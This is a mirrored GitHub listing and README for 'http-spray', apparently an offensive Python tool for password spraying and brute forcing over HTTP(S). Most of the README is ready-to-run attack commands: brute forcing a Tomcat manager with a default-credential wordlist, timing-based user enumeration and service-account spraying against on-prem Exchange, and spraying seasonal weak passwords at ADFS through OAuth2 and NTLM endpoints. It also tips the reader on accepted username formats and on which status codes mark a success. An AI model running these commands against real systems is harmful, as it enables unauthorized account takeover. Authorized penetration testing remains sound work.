https://github.com/dadevel/http-spray
Password Spraying and Brute Forcing over HTTP(S)
https://github.com/dadevel/http-spray
brute-force http password-spraying
Last synced: 4 months ago
JSON representation
Password Spraying and Brute Forcing over HTTP(S)
- Host: GitHub
- URL: https://github.com/dadevel/http-spray
- Owner: dadevel
- License: mit
- Created: 2024-06-26T09:42:33.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-02-19T23:31:53.000Z (5 months ago)
- Last Synced: 2025-02-20T00:31:06.218Z (5 months ago)
- Topics: brute-force, http, password-spraying
- Language: Python
- Homepage:
- Size: 29.3 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# http-spray
## Setup
Install with [pipx](https://github.com/pypa/pipx/).
~~~ bash
pipx install git+https://github.com/dadevel/http-spray.git
~~~
## Usage
Brute force Tomcat manager.
~~~ bash
curl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt
http-spray -t https://app.corp.com/tomcat/manager/html -m basic -C ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'
~~~
Time-based user enumeration against on-prem Exchange server.
Requests for valid users take about 0.1s, invalid users take more than 1.5s.
~~~ bash
http-spray -t https://mail.corp.com/rpc/ -m basic -U ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time < 0.5)'
~~~
> **Note:**
>
> The user enumeration requires basic authentication and seems to work only with the user formats `corp\jdoe` and `corp.com\jdoe` where `jdoe` is the *samaccountname*.
Spray common service accounts against on-prem Exchange server.
~~~ bash
http-spray -t https://mail.corp.com/rpc/ -m ntlm -c scanner:scanner -c printer:printer | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'
~~~
> **Note:**
>
> The RPC endpoint returns 404 for successful logins.
> For alternate endpoints see [here](https://github.com/dadevel/wordlists/raw/main/windows/exchange.txt).
>
> Furthermore Exchange accepts the following username formats: `jdoe`, `corp\jdoe`, `corp.com\jdoe` and `[email protected]` where `jdoe` is the *samaccountname*.
> Depending on the environment the *mail* attribute, e.g. `[email protected]`, might work for the OWA web login.
Spray weak passwords against ADFS trough OAuth2 password grant.
~~~ bash
http-spray -t https://sts.corp.com/adfs/oauth2/token/ -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'
~~~
Spray weak passwords against ADFS trough NTLM authentication.
~~~ bash
http-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json
~~~
> **Note:**
>
> ADFS accepts the following username formats: `corp\jdoe`, `corp.com\jdoe` and `[email protected]` where `jdoe` is the *samaccountname*.
> Depending on the environment the *mail* attribute, e.g. `[email protected]`, might work as well.